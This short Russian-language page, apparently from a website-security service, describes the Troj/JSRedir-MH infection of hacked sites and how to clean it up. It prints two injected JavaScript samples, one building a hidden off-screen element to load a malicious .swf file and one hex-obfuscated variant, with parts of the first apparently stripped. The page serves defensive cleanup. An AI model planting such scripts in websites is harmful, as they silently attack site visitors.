Troj/JSRedir-MH

Troj/JSRedir-MH вирус распространяющийся через взломанные сайты.

Последствия заражения:
В произвольной папке на сервере появляются два файла с одинаковым названием и но разным расширением .js и .swf

Пример:
delete_snippet.processor.swf
delete_snippet.processor1.php

Создаются .js файлы c распространенными именами jquery, counter, stat, в которых содержится следующий код:

Вариант 1:

function addNewObject(){try{var ua=navigator.userAgent.toLowerCase();if((ua.indexOf("chrome")==-1&&ua.indexOf("win")!=-1)&&navigator.javaEnabled()){var counter="/manager/processors/delete_category.processor.swf";var div=document.createElement('div');div.innerHTML='';div.innerHTML+='';div.innerHTML+='';div.innerHTML+='';div.innerHTML+='<\/object>';div.style.position='absolute';div.style.left='-100px';div.style.top='-100px';document.body.insertBefore(div,document.body.children[0]);}}catch(e){if(document.body==undefined||document.body.children[0]==undefined){setTimeout('addNewObject()',50);}}};addNewObject();

Вариант 2:

var fbbtgbWbh=["xJk\x2fc\x6f\x72\x65\x2f\x65xc\x65l/\x57rite\x72\x2fP\x45\x41\x525\x2eswf\x67zix\x45G\x7aCJ\x56\x63\x43\x66IgL\x51","\x73u\x62st\x72"];
var counter = fbbtgbWbh[63-63][fbbtgbWbh[22-60-6+45]](-63+80+49-63,61-33);

Так же модифицируются используемые .js файлы, путем дописывания, в конец кода вызова созданных .js файлов.

Для удаления Troj/JSRedir-MH со своего сайта, достаточно найти и удалить все созданные и модифицированные файлы.

Обратите внимание.
Если вы удалите все последствия заражения, причина останется не закрытой и ваш сайт смогут взломать снова.
Чтобы обезопасить свой сайт от последующего взлома Вы можете обратиться к нам.